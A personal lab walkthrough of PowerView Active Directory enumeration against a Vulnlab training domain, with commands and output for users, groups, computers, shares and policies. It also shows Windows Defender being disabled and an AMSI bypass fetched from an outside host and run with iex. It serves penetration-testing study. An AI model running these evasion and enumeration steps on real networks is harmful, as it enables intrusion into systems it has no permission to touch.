PowerView Walkthrough
PowerView.ps1 can be found here
PowerView.ps1 can be downloaded here
Documentation
For more functions, check out:
Some Awesome Cheat Sheets
HarmJ0y also has a good article on using some of PowerView’s interesting functionality.
Personal notes
In the demo’s below, i used Delegate VM from vulnlab
I logged in with win-rm as admistrator and disabled Windows Defender !
*Evil-WinRM* PS C:\windows\tasks> Set-MpPreference -DisableRealtimeMonitoring $true
I have then downloaded PowerView in one of my Windows 10 PC’s for practice Purposes.
First, you need to fireup your command prompt and type:
powershell.exe -nop -exec bypass
You then need to import the PowerView module as follows:
Import-Module [full path to powerview.ps1]
Alternatively, You could run:
powershell -ep bypass
Followed by:
. .\PowerView.ps1
From here we can start enumerating😉
We can get information about the domain as follows:
Get-NetDomain
*Evil-WinRM* PS C:\windows\tasks> Get-NetDomain Forest : delegate.vl DomainControllers : {DC1.delegate.vl} Children : {} DomainMode : Unknown DomainModeLevel : 7 Parent : PdcRoleOwner : DC1.delegate.vl RidRoleOwner : DC1.delegate.vl InfrastructureRoleOwner : DC1.delegate.vl Name : delegate.vl
Getting information about DC’s [ you must be an Administrator to view this ]
AGAIN 1st disable AMSI !
*Evil-WinRM* PS C:\windows\tasks> whoami delegate\administrator *Evil-WinRM* PS C:\windows\tasks> (new-object system.net.webclient).downloadstring("http://10.8.2.138:8000/AMSIBypassPatch.ps1")|iex Protection Disabled *Evil-WinRM* PS C:\windows\tasks> import-module .\PowerView.ps1 *Evil-WinRM* PS C:\windows\tasks>
some below commands give error ( no clue… )
*Evil-WinRM* PS C:\windows\tasks> Get-NetDomainControllers The term 'Get-NetDomainControllers' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
To query domain policies
Get-DomainPolicy
*Evil-WinRM* PS C:\windows\tasks> Get-DomainPolicy Unicode : @{Unicode=yes} SystemAccess : @{MinimumPasswordAge=1; MaximumPasswordAge=42; MinimumPasswordLength=7; PasswordComplexity=1; PasswordHistorySize=24; LockoutBadCount=0; RequireLogonToChangePassword=0; ForceLogoffWhenHourExpire=0; ClearTextPassword=0; LSAAnonymousNameLookup=0} KerberosPolicy : @{MaxTicketAge=10; MaxRenewAge=7; MaxServiceAge=600; MaxClockSkew=5; TicketValidateClient=1} RegistryValues : @{MACHINE\System\CurrentControlSet\Control\Lsa\NoLMHash=System.Object[]} Version : @{signature="$CHICAGO$"; Revision=1} Path : \\delegate.vl\sysvol\delegate.vl\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf GPOName : {31B2F340-016D-11D2-945F-00C04FB984F9} GPODisplayName : Default Domain Policy
* From ActiveDirectory Powershell Module
*Evil-WinRM* PS C:\windows\tasks> Get-ADDefaultDomainPasswordPolicy ComplexityEnabled : True DistinguishedName : DC=delegate,DC=vl LockoutDuration : 00:30:00 LockoutObservationWindow : 00:30:00 LockoutThreshold : 0 MaxPasswordAge : 42.00:00:00 MinPasswordAge : 1.00:00:00 MinPasswordLength : 7 objectClass : {domainDNS} objectGuid : b74fec45-7fd8-4db4-b82c-86e2727310ea PasswordHistoryCount : 24 ReversibleEncryptionEnabled : False
.
If we wanted to enumerate Users:
Get-NetUser
*Evil-WinRM* PS C:\windows\tasks> Get-NetUser logoncount : 575 badpasswordtime : 9/26/2023 2:28:11 AM description : Built-in account for administering the computer/domain distinguishedname : CN=Administrator,CN=Users,DC=delegate,DC=vl objectclass : {top, person, organizationalPerson, user} lastlogontimestamp : 11/21/2024 11:31:42 PM name : Administrator objectsid : S-1-5-21-1484473093-3449528695-2030935120-500 samaccountname : Administrator logonhours : {255, 255, 255, 255...} admincount : 1 codepage : 0 samaccounttype : USER_OBJECT accountexpires : 12/31/1600 4:00:00 PM countrycode : 0 whenchanged : 11/22/2024 7:31:42 AM instancetype : 4 objectguid : b27dc933-9a1f-4f1f-8d0d-07b1efdd6ae7 lastlogon : 10/12/2023 3:05:06 AM lastlogoff : 12/31/1600 4:00:00 PM objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=delegate,DC=vl dscorepropagationdata : {8/26/2023 9:55:18 AM, 8/26/2023 9:55:18 AM, 8/26/2023 9:40:08 AM, 1/1/1601 6:12:16 PM} memberof : {CN=Group Policy Creator Owners,CN=Users,DC=delegate,DC=vl, CN=Domain Admins,CN=Users,DC=delegate,DC=vl, CN=Enterprise Admins,CN=Users,DC=delegate,DC=vl, CN=Schema Admins,CN=Users,DC=delegate,DC=vl...} whencreated : 8/26/2023 9:39:30 AM iscriticalsystemobject : True badpwdcount : 0 cn : Administrator useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD usncreated : 8196 primarygroupid : 513 pwdlastset : 8/26/2023 8:46:29 AM usnchanged : 127024
The above command spits a ton of information for all users. Assuming you are enumerating an organization with many users, this can generate a whole bunch of information. We can filter all users though by running:
Get-NetUser | select cn
or
Get-NetUser | select samaccountname
*Evil-WinRM* PS C:\windows\tasks> Get-NetUser | select cn cn -- Administrator Guest krbtgt A.Briggs b.Brown R.Cooper J.Roberts N.Thompson
If we want to get all the groups a user is a member of
Get-DomainGroup -MemberIdentity username | select cn
or
Get-DomainGroup -MemberIdentity username | select samaccountname
*Evil-WinRM* PS C:\windows\tasks> Get-DomainGroup -MemberIdentity b.brown | select cn cn -- Domain Users
If you wanted to check if the current user context has local administrator access
Invoke-CheckLocalAdminAccess
*Evil-WinRM* PS C:\windows\tasks> whoami delegate\administrator *Evil-WinRM* PS C:\windows\tasks> Invoke-CheckLocalAdminAccess ComputerName IsAdmin ------------ ------- localhost True
If you wanted to check if the current user has administrative access to the local (or a remote) machine
Test-AdminAccess
*Evil-WinRM* PS C:\windows\tasks> Test-AdminAccess ComputerName IsAdmin ------------ ------- localhost True
Lazy admins can leave behind some juicy details on the description. We can pull descriptions only by running:
Get-NetUser | select description
.
*Evil-WinRM* PS C:\windows\tasks> Get-NetUser b.brown | select description description ----------- *Evil-WinRM* PS C:\windows\tasks>
f we want to get all the groups a user is a member of
Get-DomainGroup -MemberIdentity username | select cn
or
Get-DomainGroup -MemberIdentity username | select samaccountname
*Evil-WinRM* PS C:\windows\tasks> Get-DomainGroup -MemberIdentity j.roberts | select cn cn -- Domain Users delegation admins
To get all the effective members of a group:
Get-DomainGroupMember -Identity "Domain Admins" -Recurse
*Evil-WinRM* PS C:\windows\tasks> Get-DomainGroupMember -Identity "Domain Admins" -Recurse GroupDomain : delegate.vl GroupName : Domain Admins GroupDistinguishedName : CN=Domain Admins,CN=Users,DC=delegate,DC=vl MemberDomain : delegate.vl MemberName : Administrator MemberDistinguishedName : CN=Administrator,CN=Users,DC=delegate,DC=vl MemberObjectClass : user MemberSID : S-1-5-21-1484473093-3449528695-2030935120-500
Get Information about all computers:
Get-NetComputer
*Evil-WinRM* PS C:\windows\tasks> Get-NetComputer pwdlastset : 11/26/2024 10:55:07 PM logoncount : 164 msds-generationid : {46, 251, 32, 236...} serverreferencebl : CN=DC1,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=delegate,DC=vl badpasswordtime : 12/31/1600 4:00:00 PM msds-additionaldnshostname : dc1.debugger.vl distinguishedname : CN=DC1,OU=Domain Controllers,DC=delegate,DC=vl objectclass : {top, person, organizationalPerson, user...} displayname : DC1$ lastlogontimestamp : 11/26/2024 10:55:04 PM name : DC1 primarygroupid : 516 objectsid : S-1-5-21-1484473093-3449528695-2030935120-1000 samaccountname : DC1$ localpolicyflags : 0 codepage : 0 samaccounttype : MACHINE_ACCOUNT whenchanged : 11/27/2024 6:55:28 AM accountexpires : NEVER cn : DC1 operatingsystem : Windows Server 2022 Standard instancetype : 4 msdfsr-computerreferencebl : CN=DC1,CN=Topology,CN=Domain System Volume,CN=DFSR-GlobalSettings,CN=System,DC=delegate,DC=vl objectguid : 3dc17337-6dde-4562-8fc7-50cdd3a94def operatingsystemversion : 10.0 (20348) lastlogoff : 12/31/1600 4:00:00 PM objectcategory : CN=Computer,CN=Schema,CN=Configuration,DC=delegate,DC=vl dscorepropagationdata : {8/26/2023 9:40:08 AM, 1/1/1601 12:00:01 AM} serviceprincipalname : {Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/DC1.delegate.vl, TERMSRV/DC1, TERMSRV/DC1.delegate.vl, ldap/DC1.delegate.vl/DELEGATE...} usncreated : 12293 lastlogon : 11/26/2024 10:55:34 PM badpwdcount : 0 msds-additionalsamaccountname : DC1 useraccountcontrol : SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION whencreated : 8/26/2023 9:40:08 AM countrycode : 0 iscriticalsystemobject : True msds-supportedencryptiontypes : 28 usnchanged : 127030 ridsetreferences : CN=RID Set,CN=DC1,OU=Domain Controllers,DC=delegate,DC=vl dnshostname : DC1.delegate.vl
.
Enumerating what operating systems are used on the domain
Get-NetComputer | select operatingsystem
*Evil-WinRM* PS C:\windows\tasks> Get-NetComputer | select operatingsystem operatingsystem --------------- Windows Server 2022 Standard
.
Enumerating groups
Get-NetGroup
This spits a ton of information
*Evil-WinRM* PS C:\windows\tasks> Get-NetGroup > output.txt grouptype : CREATED_BY_SYSTEM, DOMAIN_LOCAL_SCOPE, SECURITY admincount : 1 iscriticalsystemobject : True samaccounttype : ALIAS_OBJECT samaccountname : Administrators whenchanged : 8/26/2023 9:55:18 AM objectsid : S-1-5-32-544 objectclass : {top, group} cn : Administrators usnchanged : 12772 systemflags : -1946157056 name : Administrators dscorepropagationdata : {8/26/2023 9:55:18 AM, 8/26/2023 9:40:08 AM, 1/1/1601 12:04:16 AM} description : Administrators have complete and unrestricted access to the computer/domain distinguishedname : CN=Administrators,CN=Builtin,DC=delegate,DC=vl member : {CN=Domain Admins,CN=Users,DC=delegate,DC=vl, CN=Enterprise Admins,CN=Users,DC=delegate,DC=v l, CN=Administrator,CN=Users,DC=delegate,DC=vl} usncreated : 8199 whencreated : 8/26/2023 9:39:30 AM instancetype : 4 objectguid : 35c4abd9-945a-4fec-818a-b9ffa0a88c09 objectcategory : CN=Group,CN=Schema,CN=Configuration,DC=delegate,DC=vl grouptype : CREATED_BY_SYSTEM, DOMAIN_LOCAL_SCOPE, SECURITY Description : Users are prevented from making accidental or intentional system-wide changes and can run mo member : {CN=Domain Users,CN=Users,DC=delegate,DC=vl, CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=del etc.etc
We can summarise all the information above by running
Get-NetGroup | select name
*Evil-WinRM* PS C:\windows\tasks> Get-NetGroup | select name name ---- Administrators Users Guests Print Operators Backup Operators Replicator Remote Desktop Users Network Configuration Operators Performance Monitor Users Performance Log Users Distributed COM Users IIS_IUSRS Cryptographic Operators Event Log Readers Certificate Service DCOM Access RDS Remote Access Servers RDS Endpoint Servers RDS Management Servers Hyper-V Administrators Access Control Assistance Operators Remote Management Users Storage Replica Administrators Domain Computers Domain Controllers Schema Admins Enterprise Admins Cert Publishers Domain Admins Domain Users Domain Guests Group Policy Creator Owners RAS and IAS Servers Server Operators Account Operators Pre-Windows 2000 Compatible Access Incoming Forest Trust Builders Windows Authorization Access Group Terminal Server License Servers Allowed RODC Password Replication Group Denied RODC Password Replication Group Read-only Domain Controllers Enterprise Read-only Domain Controllers Cloneable Domain Controllers Protected Users Key Admins Enterprise Key Admins DnsAdmins DnsUpdateProxy delegation admins
To locate shares on hosts in the local domain
Invoke-ShareFinder
*Evil-WinRM* PS C:\windows\tasks> Invoke-ShareFinder Name Type Remark ComputerName ---- ---- ------ ------------ ADMIN$ 2147483648 Remote Admin DC1.delegate.vl C$ 2147483648 Default share DC1.delegate.vl IPC$ 2147483651 Remote IPC DC1.delegate.vl NETLOGON 0 Logon server share DC1.delegate.vl SYSVOL 0 Logon server share DC1.delegate.vl
To pull Group Policy Objects (GPO’s)
Get-NetGPO
This spits a ton of information
*Evil-WinRM* PS C:\windows\tasks> Get-NetGPO usncreated : 5672 systemflags : -1946157056 displayname : Default Domain Policy gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}][{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}][{B1BE8D72-6EAC-11D2-A4EA-00C04F79F83A}{53D6AB1B-2488-11D1-A28C-00 C04FB94F17}] whenchanged : 9/9/2023 2:10:32 PM objectclass : {top, container, groupPolicyContainer} gpcfunctionalityversion : 2 showinadvancedviewonly : True usnchanged : 69785 dscorepropagationdata : {8/26/2023 9:40:08 AM, 1/1/1601 12:00:00 AM} name : {31B2F340-016D-11D2-945F-00C04FB984F9} flags : 0 cn : {31B2F340-016D-11D2-945F-00C04FB984F9} iscriticalsystemobject : True gpcfilesyspath : \\delegate.vl\sysvol\delegate.vl\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9} distinguishedname : CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=delegate,DC=vl whencreated : 8/26/2023 9:39:29 AM versionnumber : 9 instancetype : 4 objectguid : 3b9a44f2-0449-4fa2-87f6-d7255d9613f4 objectcategory : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=delegate,DC=vl usncreated : 5675 systemflags : -1946157056 displayname : Default Domain Controllers Policy gpcmachineextensionnames : [{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}] whenchanged : 9/9/2023 2:10:32 PM objectclass : {top, container, groupPolicyContainer} gpcfunctionalityversion : 2 showinadvancedviewonly : True usnchanged : 69787 dscorepropagationdata : {8/26/2023 9:40:08 AM, 1/1/1601 12:00:00 AM} name : {6AC1786C-016F-11D2-945F-00C04fB984F9} flags : 0 cn : {6AC1786C-016F-11D2-945F-00C04fB984F9} iscriticalsystemobject : True gpcfilesyspath : \\delegate.vl\sysvol\delegate.vl\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9} distinguishedname : CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=delegate,DC=vl whencreated : 8/26/2023 9:39:29 AM versionnumber : 8 instancetype : 4 objectguid : 108e9cde-591e-4f3f-a3b4-d51b9ac0dd55 objectcategory : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=delegate,DC=vl
We can narrow it down by selecting specific attributes. For example
Get-NetGPO | select displayname, whenchanged, whencreated
*Evil-WinRM* PS C:\windows\tasks> Get-NetGPO | select displayname, whenchanged, whencreated displayname whenchanged whencreated ----------- ----------- ----------- Default Domain Policy 9/9/2023 2:10:32 PM 8/26/2023 9:39:29 AM Default Domain Controllers Policy 9/9/2023 2:10:32 PM 8/26/2023 9:39:29 AM
If you have any questions, don’t ask